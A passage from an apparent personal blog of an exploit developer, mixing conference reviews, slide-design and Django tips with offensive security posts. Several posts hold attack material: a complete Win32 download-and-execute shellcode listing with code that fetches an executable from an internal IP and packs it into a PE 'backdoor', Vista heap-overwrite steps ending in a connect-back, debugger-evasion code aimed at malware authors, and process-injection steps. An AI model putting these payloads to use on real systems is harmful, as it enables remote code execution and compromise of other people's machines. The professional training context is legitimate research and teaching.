return ["subl $%d,%%eax\n"%int(words[1])]

It will be really simple, based on the IL to transform the IL into a virtual machine packer.

x86parser.py It's the file in charge of transforming the output assembly into opcode.
makeexe.py This file is in charge of creating, based on the created shellcode a binary with the corresponding fileformat. If you are talking Windows (which is not released on 2.0, canvas client's only for now), you can probably create one of the smallest PE a compiler can gave you (And forget about IAT or any Import.). And this step you can easily create your own ELF, including whatever tweak you might wanna add.

Hopefully soon I will made a bigger post with much more details. For a good read, get Rich's paper. Or directly download MOSDEF 2.0 sources.

Cheers,
Nico
PS: Since we released MOSDEF 2.0, we are preparing a one-two day trainning on Windows 32 Shellcode writing. If you are interested, ping me.

Hacking mainstream

2009-01-30T09:58:00.000-08:00

Dear diary,
Back in the time, when I was a still doing linux exploits and thought that real man infoleak/bruteforce themselves to shellcode, that client-side where for pony tails nymphets and denial of service on hoolios where for lonely guys that drinks fruit daikiris, Dave came to me with a new project that he wants me to manage: Visualsploit
At first though "I prefer to write advisory for Antivirus vulnerabilities" rather than working on a Visual Language for exploits, who in the world would ever use that?.
And as it happen with smart people vision, time gave you always the response to that. We hired Damian Gomez full time to work on the project, I helped a little bit with the core but most of them it was just Dami, all the nice icons and the cool features.
Visualsploit was never focus on selling it, as i though, but rather as a swiss knife for Trainnings. The visual language gives -great- advantage of avoiding dealing with programming at all on a class, obviously, we encourage people to modify the scripts and learn the python, but for classes such as Basic Stack Overflow or even Heap overflow, whats the need of forcing someone to learn python? In the end, is as we always said... Exploiting is nothing more than smart debugging.
Today I spent an hour adding two modules that communicate with my exercise server, one for allocating memory and the other one for overwriting information. Because, if you have 4 days to explain how to exploit Windows 2000, XP-2003 and Vista, you certainly don't want to make your students spent time debugging the protocol.

Cheers,
Nico
PS: Yes, the icons for Allocate/Overwrite were also made by dami!

Hacking Vista Heap: The Ben Hawkes technique part II

2009-01-19T11:17:00.000-08:00

"Even though I walk through the valley of the shadow of death, I will fear no evil..."

On the blog entry "If you are doing your homework correctly..." i showed a little bit how you can modify the LSB of a heap pointer and after freeing it, you can get the heap address on a RtlAllocateHeap call. This is part of Ben Hawkes presentation at RUXCON.

The second step was to construct the overwritting buffer for the Global Heap structure that will allow you to trigger the RtlCommitRutine (which is a function pointer that it triggers when the heap wants to be extended).
To created, you need two hardcoded address (or heap-spray based, or other lovely trick based as sotirov-downd .NET dll load), for the "BlockIndex" and the "UCREntry" else you will suffer for all kind of reading/writing crash in ntdll.dll.

Now, i might be wrong with this statement but on the code flow i follow, the first hardcode address need to fullfilth much more requirements than the one announced by the good old Ben.

BlockIndex
There are a couple of ways to allocate on the Vista Heap, which depends on the heap usage (f.e.: The activation of the Low Fragmentation Heap on a given size), argument passed, etc. In our case, to extend it we are gonna allocate without using a Bucket which is the common behaviour.
The BlockIndex is a structure which is saved at [PHEAP+0xB8] and is the first hardcode address we need to craft.

This structure has a single-list which connect other BlockIndex, so our address should have the first Dword as 0x0

*( Blocks + 0) == 0x0

The next dangerous point in code, is when the Block use the FreeListPointer to get a double linked list of chunks out of it.

*( Blocks + 0x18 ) == FLP (FLP needs to be a existing readable addresss)

FLP as I said before, is a double linked list, so the algorythm will take the Backward Link to grab the first chunk out of it.

*(FLP + 4) === CHUNK (CHUNK needs to be readable)

And later, it will take the CHUNK and check the first dword of it and compare it against PHEAP-EncodeFlagMask

*(CHUNK - 8 ) == CONSTANT (if it's zero, its better).

And that it! (he he).
Yes, it doesn't pass the strawberry pudding rule, but as hard as it looks, it's not -that- hard to find address that fullfilth all those requirements. The 2nd hardcode address (UCREntry) requirements are well explained on Ben Hawkes presentation.
I wrote a simple but useful script that try to find addresses that accomplish all those requirements, and believe it or not, there a lot of them.

The question now is: Can we really find one not affected by ASLR?

Peace,
Nico

PS: I don't want to spoil the scoop for the Japanese students on the Heap class, so I will release the script after class ;). (Anyways, you can do it yourself, it's just a couple of readLong).

God bless the interweb

2008-12-31T08:03:00.000-08:00

If you thought that the hype was all over... after the DNS and the CA affaire.
If you thought that the fun was all over... after Microsoft patch MS08-067.

You were wrong

The "Great" Bas Alberts is back on blogging: Bas on Bugs.

Happy new year.

In my free time...

2008-12-22T13:46:00.000-08:00

I torture Luciano Bello by sms him with "// MD_Update". That's the most popular Argentinian hobby after Soccer.

In other news, a cool post of Bas on credential reflection attack with CANVAS.

Peace

If you are doing your homework correctly, you will get...

2008-12-18T05:17:00.001-08:00

That's Ben Hawkes technique working on Vista for me. The chunk you see at the FreeList entry 127 is nothing more that the heap itself.

Guess what will happen next when i request the global heap's size ? I'll let that answer and the whole exercise for students in February.

I wonder what debugger Ben Hawkes use?

Things to do in Japan, if you want to exploit the heap

2008-12-08T15:01:00.000-08:00

Dear diary,
Sorry I have been sucking at blogging, but the true is I didn't do anything interesting these days, technically, at least. Unless, of course, you are part of some extinguished cult that worship django.

Anyway, since last friday I started updating my slides for the training I'm giving with the people of cyberdefense about heap exploitation in Tokyo, (which I must said that if you are interesting you should rush to reserve your ticket since it's getting full quite quick).
I update the information about windows 2003/XP SP2 exploitation, including theory and a bunch of exercise (Students will end up exploiting Brett Moore's Citrix Metaframe bug).
I'm also updating the Vista part, which was always the critical part of the class, since i gave it the last day and people were really tired by them ( And it was a lot of information of all the changes in the new implementation and ideas about how to exploit it).
And by doing some research i step into Ben Hawkes "Attacking the Vista Heap" for the RUXCON Conference.
When I think about heap exploitation, or even, generic exploitation at all, I can't stop thinking in a remote level, its probably my weakness but also my strengths. And is obviously a consequence of background education on linux explotation when I was a kid.
Did I ever told you, dear diary, that i did linux exploitation like all good boy scouts? Same as Bas, same as Sinan... and i spent 8 good months doing that for CANVAS until dave said "Windows time", and we all have to switch :>.
So when I heard about Ben Hawkes technique about writing the global heap structure (PHEAP from now on), I though it was good idea (i even though about it before reading it) but I didn't see a real usage on an remote, possible but not that simple to implement. (On remote heap exploitation, you should always follow sinan's law: If the technique have more steps than the strawberry pudding's receipt, its doesn't worth it).
But BANG! I read Ben Hawkes slides. And that was a jaw breaker!
Why? Because he follow the clicke phrase of Einstein "Everything should be made as simple as possible, but not simpler.".
Basically he ask himself: What would you do if you can write a pointer to a heap chunk with whatever you want? And he answer it quite simple, I point it to a different busy chunk.
And the math is simple, if you point the chunk's pointer to a a different busy chunk, when the chunk get's free, it will be available on the system. And so next allocation of the same size, it will return the chunk that it wasn't supposed to be free. And you will be able overwrite the data of that busy chunk.
Don't rush your rants, his obviously not pointing his chunk's pointer into a random busy chunk on the heap, that would be almost impossible to exploit reliable. Ben's magic goes much more further.
And this is nice trick: He basically makes the pointer land to the PHEAP, and since, the pheap is actually a chunk, the first of his own heap, he made the PHEAP chunk available for use to someone else. And if you combine that with a strdup [alloc/memcpy(yourstring)], you get realistic Vista Heap exploitation, without really relying on any -real- implementation trick.
And you don't need to know the address of the PHEAP, you probably just need to zero out the last numbers on the pointed chunk address ( 0x00452880 into 0x00452000, it depends obviously).
So the steps you have to do are quite simple:
1) Play with the heap in order to get a chunk's pointer next to your overwriting chunk
2) Overwrite the last numbers of that pointer to make it point to the pheap
3) Find a strdup, send a string, and overwrite the pheap including the heap cookie and the RtlCommitRutine.
4) Trigger some allocation extension and welcome your connectback!

Or you can do it in one big step, which is visiting me at Tokyo in February :>

Anyways, cheers to Ben for this great technique! I wishing to exchange some beers/wine some day!

H2HC Brazil

2008-11-12T12:55:00.000-08:00

I'm back for a 4 days trip to Brazil for the H2HC conference.
This year was held on the beatiful city of Sao Paulo, which turn out to be huge, with about 11 millions in 1500 km square kilometers.
Sao Paulo is well known for the street art, they have graphitys all around the city and apparently the thing there is who made the graphity in the most extreme place, so they go from your regular Joe's house to the 8th floor front of a big builiding, they even paint on churches and big publicity signs (Although usually the most extreme ones are just letters in black).

Anyways, I gave a keynote for the first time in my life and I believe it work out pretty well, people seems to have fun even tho they didnt laugh at my "simpsons taught me you speak spanish" joke to break the ice. A lot of people notice the effort I did on the design and congrats me on that, it worth the effort for sure! If you want to take a look at it, it can be downloaded HERE.

After me, Edgard Barbosa talk about the new framework they are releasing for Hypervisor and seems pretty nice, I'll be waiting for the binary release (Check the COSEINC website for more info).

Steve Adegbite gave a presentation about the new Microsoft program, I was too far from the speakers and couldn't get the whole presentation. I know he talked about MS Ecosystem, which i'm suscribed too, so I will get the scoop from there.

Pablo's presentation on DEP rocks! I'm not sure if everyone got the idea of how cool and useful is the project he had been working on. He gave all the insight info, and I recommend to check out his slides for the whole thing.

Thats the last presentation I could see, since I spent my whole time on the Immunity booth we had at the H2HC:

But I did escape for a little peek at:
Francisco Amato's on Evilgrade:

Felibre Nobrega's Security on USB

And Julio Auto's Reverse Engineer (Which I finally met. Its a great and smart guy, too bad the presentation was in Portuguese):

The conference was really good, I get to practice my non-existance portuguese with two TV Station that make me an interview (Which was basically me showing how to own machines with CANVAS) and spent good times with a lot of new friends.

I would like to thanks Rodrigo "BSDaemon" Rubira Branco and Felipe Balestra for inviting us to the conference. They did an amazing job and I bet people will appreciate it.

Nico

Caipirinha and Python tricks

2008-11-01T14:54:00.000-07:00

Yes, I don't have anything to blog about. And I know the rule, "If you are not better than the silence, then shut up".
But here I'm been part of the interweb, where everyone show and nobody watch.

Anyways, been doing a lot django development lately (yeah, that's -how- flexible my work is) and since we have to do a lot of things dynamic, I will show you a couple of tricks that might be useful.

First, I have been learning lisp on my free time, and that is why lately my code is all one liners:

if a ? b : c
in python:
( b, c)[ a ]
example:
("bigger", "smaller or equal") [ a <20 ]

dynamic arguments:
function( *a, **b)
example:
function( **{ 'name': 'nico'} )
is the same as: function(name="nico")

django's trick:
Model's OR search:
from django.db.models import Q
model.objects.filter( Q(name="nico") | Q(lastname="waisman") )

COUNT and GROUP BY (undocumented):
Find the names that get more repeated:
c = model.objects.extra( select = {'entry_count': "count(name)"} )
c.query.group_by = ['name']

The information can get for the result object by accesing the "entry_count" fields. This will be unsorted, if you want to get the top 5 then (i wish there were another way, but couldn't find it):
names = sorted( c, lambda x,y: cmp( y.entry_count, x.entry_count) )

Don't you love lambda? Once you get used to the whole map, filter and reduce is like heroin, impossible to quit, unless you get into religion.

Now the Caipirinha part of the post: Next thursday Pablo Solé and I will be flying to the beatiful city of Sao Paulo in Brazil to present at the H2HC conference. Immunity will have a booth, so please came by to said hi so we don't feel lonely :).
We will be doing the NOP certification for the first time in latin america, so if you are around and hungry for stack overflows, contact us!

Peace

Thoughts on slide design

2008-10-26T14:08:00.000-07:00

One of the things researcher should think about, whether they like it or not, is slide design.
Showing your results is an important part of the research, because its the point you justify the budget invested. Obviously, there is no need of slides when you got a remote on IIS 6, but for those of us who are mortals (a.k.a non-sinans) we need to show pretty things and make people happy.
This not only apply for business meeting but most important for conferences.
How many times you spent looking at lousy slides, full of bullet points that are in the middle between a paper and presentation slides. The true is, as Dave says, you have two types of public: the one in the conference and the people that will download the slides later.
But even if you have to keep in mind the online public, why not making your slides pretty?

I have been researching about the best way to improve my slides, for the keynote i'm presenting at H2HC in November.
And here are some tips I have been collecting.

Is not about the software
I have always thought that openoffice was ugly, and it actually is. But that doesn't mean you can make a wonderful presentation with it. Just avoid using their feature as much as possible. And if you have to do boxes, try to make them different as their are supposed to (drop the line, add transparency, shadow, use non-default color, etc).

DROP THE BULLETPOINT, USE IMAGES
This is probably the best advice I can give. You presentation gets on a completely new level when you start adding images. Either if you use them as background or as an accessory, you need to get good resolution image. Let me repeat this again because is important, GOOD RESOLUTION. Don't accept anything less than 1024x768.
If you can afford them, get them from www.istockphoto.com
If you are poor Argentinian, you can get a lot of amazing images from flickr.com, the "advance search" allow you to search only for Creative Commons-licensed content.

Use the rule of third.
I did a couple of photography's courses in the past and one of the most important lesson I got on composition was the famous rule of third. Basically you need to draw insivible lines dividing your photo vertically and horizontally in 3 parts, leaving 9 squares.
The points where the invisible lines cross each other, are the aureal points, which are the places where the viewer puts more emphasis when looking at a picture. A simple arrangement of the content can improve you slide a lot.

Balancing
Your slide need to be balanced. If you put all the attention on one side of your slide, there has to be text or image in the other side that can help the viewer keep their attention in the center of the image.

Just Phrases
Try to avoid as much text as possible. Only use phrases that help you with your statement. Slides are usually there to support your presentation rather than repeat what you have said.

Slides take tremendous amount of work that you might not be able to invest, but if you do it, you won't regret it. But no matter how pretty you made your slides, at the end, it's always about the speaker.

Peace

PS: For those of us who can read spanish, the axolotl magazine has publish Cari's work on Heian's poetry.

Ba-Con and EkoParty 2008

2008-10-15T16:49:00.000-07:00

Testing, testing. One, two, three.
Testing, testing. One, two, three.
Maybe this is working. I don't know. If you can even hear me. I don't know.
But if you can hear me, listen.

Conference season is over in Buenos Aires and it was a total success. Here is my small review

dragos Ba-Con was in a really nice hotel in downtown Buenos Aires. If they keep it in the same place next year is gonna be even better, since they are changing the hotel's street into a big sidewalk and thats the Irish Pub's zone.
I went through all the presentations, some of them I already read their ppt before, others were not really of my interest.

SecViz 2007: was interesting. Splunk people made a really nice flash animation feed by xml that show information over time. If I were a network admin, i will totally used just to make my work look fancier.

WPA/WPA2: It was good, actually the first time i ever went into a Cedric's talk.

A Practical Approach to Mitigate and Remove Malware: It was a really good presentation, not because the material was good but rather Ching Tim Meng's skills as a presenter. He can make you laugh over Indonesia's cassava farming policy.

Pass-the-hash Toolkit for Windows: The toolkit is pretty good, the research even better, specially if you keep in mind that Hernan did it back in 1992ad with softice. No symbols, no IDA. For some people it was like reversing with punched cards.

Hacking PXE without reboot: I'm glad i finally met Julien. We talked a lot but never met the man behind ERESI. The presentation was pretty good, at some point he said "and now we are gonna read assembler" and there was assembler.

Alex Sotirov's on Brownser: I did read the slides from their blackhat's presentation, but see it live was a jaw breaker. All my respect to Alex and Mark.

Eko-Party was amazing. You can see the organizers hard work on their tired faces. We did two trainnings the first day, Pablo gave a condensed version of Unethical Hacking and Dami did the same for Stack Overflow. A bunch of people came into the training, hopefully we are gonna repeat the experience next year. (I'm glad i didn't put myself into any training/presentation, since i loose my voice on day 1, as Mariano Nuñez said, I sound like the godfather).

I didn't went into many presentation since I had meeting and stuff like that. But I get to see the following:

1st day:
Keynote: Dave Aitel Even tho my review wont't fair, i'm just going to said the 90's joke was hilarious.
Pablo Sole's Adobe embedded talk First time seeing pablo talking and he did amazingly good on stage.
Late Night Talks: (this was a really nice idea, basically they invite everyone into a bar and people gave 20 minutes talk)
Fernando Gont on Something related with protocols: The presentation was too formal and technical (?!) to give it on a bar. I think only 3 people paid attention to their talk, and they were sitted on the same table. Anyways, fernando either has guts or he doesn't care. I think the dictionary add a new verb after him:
gont: For the verb "to gont"
Clarify the meaning of and discourse in a learned but boring way to a bunch of drunked hackers

Andrew Cushman's on Exploiting Index: It was good presentation for the bar and the result can be seen here (Apparently they know about our advisory leech script "ms.py", hehe)

2nd day:
Sebastián García - Dime cómo atacas y te diré quién eres: Profiling attackers by the way they press keys on a shell or made mistake. I have to left the presentation in the middle, but apparently at the end he just said "all the things just presented, they don't work anymore these days". Brutally honest, for that last phrase he got my respect.
Luciano Bello - Maximiliano Bertacchini Debian's OpenSSL random number generator Bug: Great presentation, lot of graphs of keys, computers, Alice and Bob. Although, I think there was a question never asked but i believe everyone wants to heard his answer "Did you regret publishing the bug?" :).
Nicolas Economou - Alfredo Ortega Smartphones (in)security: Nice presentation, the climax got into its maximum peek when they hack their iphone's abo and SMS Luciano.

That it. Been doing boring work the last week. If you want to heard the juicy details about this MS Tuesday, check out:
http://addxorrol.blogspot.com/
http://blogs.technet.com/swi/default.aspx

Last but not least, We are gonna be soon in Brazil for the H2HC! Pablo would be giving an cool presentation on ID's deplib.py and I will be giving the Keynote called "Apology of 0days". If you are in Sao Paulo the 8/9th of November, Immunity had a booth at the conference and we will be doing the NOP Certification

Cheers

None

2008-09-27T09:24:00.000-07:00

If there is someone real that actually read this blog and it happend to be in Buenos Aires next week, I will be attending Ba-Con and the Eko Party with the Immunities. Beer talks are welcome!

By the time you read this entry...

2008-09-09T14:01:00.000-07:00

...Someone on the interweb would be trying to own you with a new MS Tuesday exploit.
There are three bugs which looks "interesting" (Keeping in mind that we have reduce our standard REALLY low. Back in the time everyone was laughing at client-side, myself included), I took the Windows Media Encoder bug (MS08_053) since I spent last week working on slides for the "Auditing ActiveX" section of the "Finding Bugs with ID" training that Dami is teaching next week.
Due to some scripts we pull out for the class (all the kudos to Justin) plus the combination of OleView it took less than an hour to find the bug, no bindiff need this time, the Advisory Workaround information is good enough to get this baby going.

Next Immunity Debugger release will bring this script, a brand new python shell based on ipython and variables.
Those of you who attending Dami's class would probably be finding working on this bug by the end of the day. I won't give away any hint other than MS08_053 is much more easy than class exercises, so look for the obvious.

One line to own them all

2008-09-08T03:34:00.000-07:00

The last Friday, i finally met Luciano Bello during the "DSP" (Drunken Security Professional, is like a 2600, but better).

For those of you who don't know Luciano, he find the infamous commented line on the openssl package in debian, ubuntu, etc which as a consequence it generate only 32k keys. (The Story short: Valgrind bitch about the line, a month-long discussion about the line, debian finally commented).

/*
* Don’t add uninitialised data.
MD_Update(&m,buf,j);
*/

Anyways, I must state that he surprise me in the good way, I though he will came with the opensource coat and will start fighting us with a tux in his right hand, trying to save the world or something, but he didn't.

We had a huge talk (most of them were laughs), at some point it was more like an interview. I regret myself not having a digital recorder (which i would mandatory buy from now on) because I pretty much forgot most of the stuffs.

As a researcher he is, in the area of cryptographic, when he discover it he wasn't looking at code as us will, instead he was comparing keys, weekends and weekends comparing keys until he realise something was not working correctly.

Something was not working as expected, keys were repeating 1 each 5000. So then he start looking into code.

The obliged question:
You could pretty much own every debian/ubuntu in the world with ssh... What did you pick?
The answer is none. And if you re ask the question including the word "hypothetical" (he wasn't 100% sure about the bug when he disclosure it), he will reply again None.
Luciano was so into the bug, testing, checking all his crypto theory that, and this is my feeling, he never realise of the consequence or what he really *had* between his hands.
He didn't realise ssh was affected until someone from debian told him and he did the math.

The conversation took around two hours, and after that I have the feeling (and this is personal) that he is a bit more into the dark side now, maybe not completely but he took a good peek.

From left to right: Luciano Bello, myself and Fran "Rulos Adolescentes" Amato (evilgrade's coder)

Btw, Luciano will be talking at the Eko Party, same as Pablo Solé and Dave Aitel from Immunity. I'll be around Eko and Ba-Con, look for the same version of me, but shaved.

Note: Picture taken by Leo from KungFoosion

That little thing called MOSDEF

2008-08-25T19:29:00.000-07:00

In a previous post, I gave a small review of the concept behind MOSDEF. I explained that is a runtime C compiler written in Python that builds shellcode for a bunch of architectures/os and that it was used on CANVAS as a post-explotation platform.

Recently I have been writing a file browser. It's a simple task (specially if you have GUI skills, which I don't) and it has the advantage of showing all the potential that MOSDEF can bring to your framework, more over if you compare it with an RPC-based.

For the file-browser, I had to make to obviously list directories (a feature with luckily already had). In an RPC environment, you will have to something like this:

hFind = call("kernel32.dll!FindFirstFile", dir, &FindFileData) print FindFileData.cFileName while call("kernel32.dll!FindNextFile" hFind, &FindFileData) != 0: print FindFileData.cFileName

(In a *nix environment, you will need to system calls, getdents and stat)

It does look nice, but for each file in the directory you have the latency of the remote call been sent and the result returned over the wire (think about as your target on the the remote forests of Xi'an).

Now, in the case of MOSDEF what you need to do is a small C file that does the same thing as python, something like this:

vars={}
vars["dir"]=dir
code="""
#import "string","dir" as "dir"
#import "local","sendstring" as "sendstring"
#import "local","sendint" as "sendint"
#import "remote", "kernel32.dll|FindFirstFileA" as "FindFirstFile"
#import "remote", "kernel32.dll|FindNextFileA" as "FindNextFile"
#import "remote", "kernel32.dll|GetLastError" as "GetLastError"

struct FILETIME { int dwLowDateTime; int dwHighDateTime; };
struct WIN32_FIND_DATA {
int dwFileAttributes;
struct FILETIME ftCreationTime;
struct FILETIME ftLastAccessTime;
struct FILETIME ftLastWriteTime;
int nFileSizeHigh; int nFileSizeLow;
int dwReserved0;
int dwReserved1;
char cFileName[260];
char cAlternateFileName[14];
};

void sendFILETIME(struct FILETIME *ft) {
sendint(ft->dwLowDateTime);
sendint(ft->dwHighDateTime);
}

void main() {
struct WIN32_FIND_DATA FindFileData;
int hFind;
int Error;
hFind = -1;
hFind = FindFirstFile(dir, &FindFileData);
if(hFind == -1) {
// We send a -1 mean there is no more file to sent
sendint(-1);
Error=GetLastError();
sendint(Error);
return 0;
} else {
sendint(FindFileData.dwFileAttributes);
sendint(FindFileData.nFileSizeLow);
sendFILETIME(&FindFileData.ftLastWriteTime);
sendstring(FindFileData.cFileName);
}
while (FindNextFile(hFind, &FindFileData) != 0) {
sendint(FindFileData.dwFileAttributes);
sendint(FindFileData.nFileSizeLow);
sendFILETIME(&FindFileData.ftLastWriteTime);
sendstring(FindFileData.cFileName);
}
Error = GetLastError();
sendint(-1);
sendint(Error); // IF ERROR_NO_MORE_FILE everything works ok :>
}
"""
self.clearfunctioncache()
request=self.compile(code, vars)
self.sendrequest(request)
countfile=0
files=[]
while 1:
attr = sint32(self.readint())
[...]

Before you mention it or you even think about it, yes, we called "Cripple C" for a good reason.
Anyways, as you imagine, this code gets compiled on your computer and it remotely resolve the addresses of the function needed. Here is the normal output you will see:

Dodir: C:\ kernel32.dll|FindFirstFileA not in cache - retrieving remotely. Getprocaddr_withmalloc: Found kernel32.dll|FindFirstFileA at 7c813559 kernel32.dll|FindNextFileA not in cache - retrieving remotely. Getprocaddr_withmalloc: Found kernel32.dll|FindNextFileA at 7c839019 kernel32.dll|GetLastError not in cache - retrieving remotely. Getprocaddr_withmalloc: Found kernel32.dll|GetLastError at 7c910331

Once MOSDEF had all the address in its cache, it send the piece of code which gets executed, after that just wait for the requested information to came back parsed and ready to be used on your application.

Here is the scoop:

Note: Yes, sometimes I do this kind of job.

Shellcode: You are doing it CORRECT

2008-08-21T18:39:00.000-07:00

Recently I've been doing a lot of shellcode writing due some special needs we had for some exploits (Check post "Apology of forking shellcodes").

One of the things that get me excited about, other than finishing the citrix_metaframe bug, is the redesign of the shellcode framework that Bas did for the last release. The system is pretty simple to use and extend (I add myself a couple of features).

Instead of explaining the obvious, let me show you how it works with a simple example, a small download to IE cache and execute shellcode.

As most of you know, CANVAS use MOSDEF a runtime compiler for a bunch of different operating system and architecture (Linux x86, Linux SPARC, Linux PPC, Solaris SPARC, Solaris Intel, BSD, AIX, Win32, OSX x86, OSX PPC, etc). Explainning all the MOSDEF details it can take a long time and I usually enjoy my sleeping. Let go with some basics: MOSDEF is a C compiler writting in Python, so that means that it has a sintax parser, an intermediate language, an assembly compiler, etc. In this case we are gonna use the assembler to compile our shellcode.

Let's start from the begging, the main class for shellcoding is basecode:

def httpcachedownload(self, urlfile):

codegen = basecode()

Once we had a basecode object, we need to tell it what would be the win32 api functions that we are gonna need. This basically would add a special stub that would resolve each of those function before our shellcode is executing. (Function resolving is been done by going through the PEB, checking the loaded dlls and comparing strings names).

codegen.find_function("kernel32.dll!loadlibrarya")
codegen.find_function("kernel32.dll!createprocessa")
codegen.find_function("kernel32.dll!exitthread")

Obviously, kernel32.dll is always loaded, but there are api function which are not always loaded, such is the case of UrlDownloadtoCacheFileA inside urlmon.dll which is the function that is gonna do all the work from us. So what we need to do is, at resolving time, Loadlibrary urlmon.dll and later resolve UrlDownloadtoCacheFileA. Sounds hard, but is obviously simple with MOSDEF:

codegen.load_library('urlmon.dll')
codegen.find_function("urlmon.dll!urldownloadtocachefilea")

We had all our resolved hashesh created, now we want to send an "argument" to our shellcode, for this special case we will need the name of the url where our .exe would be. So we are gonna add a global variable named URLNAME and we will pass our url:

codegen._globals.addString("URLNAME", urlfile)

Now we need the actual code. Yeah, its an simple framework, but we cannot escape for coding the actual assembly:

codegen.main = """
xorl %eax, %eax
mov $0x208, %edx
//movl %ecx, %edx
sub %edx, %esp
movl %esp, %esi

leal URLNAME-getpcloc(%ebp),%edi // Note how simple we load the
// given argument
pushl %esi
// BATCHCODE
// ------

pushl %eax // pBSC
pushl %eax // dwReserved
pushl %edx // dwBufLength
pushl %esi // szFileName
pushl %edi // URL
pushl %eax // lpUnkCaller
call URLDOWNLOADTOCACHEFILEA-getpcloc(%ebp) // Calling a function
// needs the name
// with caps.
//returns a HFILE handle

pop %esi // get the file back

xorl %eax, %eax
movl $0x100, %ecx
subl %ecx, %esp
movl %esp, %edi // CLEAR the buffer
rep stosb

leal 16(%esp), %ecx
leal 84(%esp), %edx
mov $0x1, 0x2c(%edx)

pushl %ecx // PROCESS INFORMATION
pushl %edx // STARTUP INFO
pushl %eax
pushl %eax
pushl %eax // Creation Flag
pushl %eax
pushl %eax
pushl %eax
pushl %esi // command
pushl %eax
call CREATEPROCESSA-getpcloc(%ebp)
xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)
"""

Quite simple, isn't it? We call UrlDownloadtoCacheFileA with the given url, this would return the place where it saved the downloaded file on the szFileName argument (reg %esi) and later we simple call CreateProcessA.

Before i get any comment bitching about how this code can be optimized, I KNOW, i just didn't do it yet.

So the last thing we need return the assembly code formatted:

return codegen.get()

From your exploit, you can go like:

import shellcode.clean.windows.payloads as payloads
p = payloads.payloads()
code = p.httpdownload("http://172.16.71.2:8080/file.exe")
sc = p.assemble( code )

sc would have your shellcode. Now if you want to test it on a debugger without exploiting something or you just want to make a backdoor out of it:

import MOSDEF.pelib as pelib
myPElib = pelib.PElib()
exe = myPElib.createPEFileBuf(sc, gui=True)
file = open('test.exe', 'wb+')
file.write(exe)
file.close()

Peace

thing you care if you are writing malware...

2008-08-17T14:53:00.000-07:00

There are million of ways to detect a debugger. I'm usually on the other side, "millions of ways to hide a debugger", but this time let me show you a simple but neat trick.
Call the win32 api function GetCommandLine and check if the last char is a space.
If it isn't, means its been executed from a debugger (tested on ID and windbg) or the command shell.

LPSTR ptr;
unsigned int ret;

ptr = GetCommandLine();
ret = strlen(ptr);
if(ptr[ret-1] == ' ')
printf("Carry On\n");
else
printf("Debugger detected!\n");

In other news, if you feel like having a good cabernet sauvignon, a juicy steak or listening to hackers talking about what they know Buenos Aires is your place the first days of October:
cansecwest's dragos is throwing a conference this year: Ba-Con
And exactly the day after, the second edition of the Eko-party including Dave Aitel as a keynote "Hacking Has An Economy of Scale" and Pablo Solé recon talk "Adobe javascript unleashed".

I'll be around!

deep deep...

2008-08-15T19:02:00.000-07:00

What's lower than stealing a bug from someone and publish it?

Stealing a NULL pointer read...

http://www.nullcode.com.ar/ncs/crash/nsloo.htm*

You must be starving for fame, go fuzz an AV!

* The bug on that website was found by raddy long time ago

The exploit development's moebius strip

2008-08-07T19:34:00.000-07:00

Let me talk a little about one of my main tasks at Immunity: solving
complex problems. Solving complex problems is an important and interesting job, specially for
some curious mind that enjoy the masochistic task of facing difficult
challenges every day.

On the opposite side of all the excitement described you go through a series
of moods on the different steps of the problem, which i had named the
"the exploit development's circle"...

EXCITEMENT: It begin with excitement about the new challenge you will be facing. You set up your environment and start getting familiar with all the details.

DECEPTION: With all the adrenaline flowing through your vein, your face hits directly into a wall . The challenge seems to be more complex than expected and all the common hopes of succeed get lower every minute.

DEPRESSION: After days of failure and using all your experience and your brain cells, the exploit remains exactly the same as the first day. The adrenaline in the blood is replaced by epic amounts of caffeine, you go to sleep and all you can think of is the time spent on a bug that might not be able to exploit it.

FAITH: You tell your boss this is impossible, that we need to switch into something else. He persistently gave you support but your ears are so occupied listening to your psychological repression mechanism telling you how bad you are at this and that you should apply for a job that requires less mental effort such as a clerk in your local video store. A millisecond before quitting this module for good , an idea emerge, you are not certain where it came from, maybe it was a signal sent by the old thyresias that you predict subconsciously with pigeon's flight from your windows or your last neuron burning the last portion of energy left, but the true is that your idea might work.

SUCCESS: It Work! Your last minute theory Works. All the glory, the little pieces of colorful paper dancing in the air, the clowns, the trumpets. Your exploit is working and the cold sweat is now gone. After all the congratulations, your self-steem is over the clouds and the routine testing (which you know they gonna work successfuly) your 15 minutes of glory will be long gone and the next task will bring the circle back to where it start.

Apology of forking shellcode

2008-08-05T18:36:00.000-07:00

*Note: To practice my writing i will start doing random post in english, most of them related with computers.*

I remember back in the time, when Dave was trying to chill-out from a hard day of work he start to do a simple "half and hour" hoolio (In Immunity's slang, hoolio is an exploit for bizarre software, named after -Julio FTP Server-), and so he start do savant. For those who never exploit, it takes a bit more than half-and-hour. Refer to Advance Stack Overflow.

The last thing I did, is fully port the neat exploit that Brett Moore did for Syscan to CANVAS, its a really interesting bug and a good proof of concept for windows 2003 explotation (Since today, we are gonna include it on the Heap overflow trainning). I'm not gonna get into the details since Brett cover them all up, i just wanna state that is a nice bug and with some work it can be exploit it quite reliable. The problem was different this time: Shellcode.

The great problem on shellcode execution is that the heap is screwed by whatever primitive you use, so it will eventually gonna crash on an allocation. It can be fixed, but you will never be 100% sure that you did it correctly, and probably you will end up with a big shellcode.

Our usual response to this problem is -Process Injection-, Bas (also known as The great Bas Alberts) wrote a great shellcode a couple of years ago, which inject mosdef shellcode into whatever process is given and execute the connect back. We tag-team a little bit on this exploit before he left to reduce shellcode size (since I only had around 0x300 bytes).

I did all of this without checking the thread privilege (kids, dont do that at home, we are security professional trained to do such dumb mistakes), so when i run my exploit nothing significant happens.

Since I believe in science, i look for the causes, and this time i found out the worst: I didn't have the SeDebugPrivilige. Usually is disable, and you can easily enable with a couple of lines of assembly, but this time it was not there. In simple words:
Good bye Inject shellcode, Welcome trouble.

Next step, ForkLoad shellcode. We had a template of what is supposed to be fork shellcode, but it was never finished, and so it was my task for the last couple of days. (sheesh, I did all this write up to get into this point).

In 2003 the Last Stage of Delirium group release a paper on win32 shellcode, which between other amazing tricks they talk about a Fork Load shellcode, they made it look simple:

1) Create the process in Suspended Mode

STARTUPINFO si = {0}; PROCESS_INFORMATION pi;
CONTEXT ctx;
CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &si, π);

2) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.Thread, &ctx);

3) Remote VirtualAllocate and Write our shellcode there.

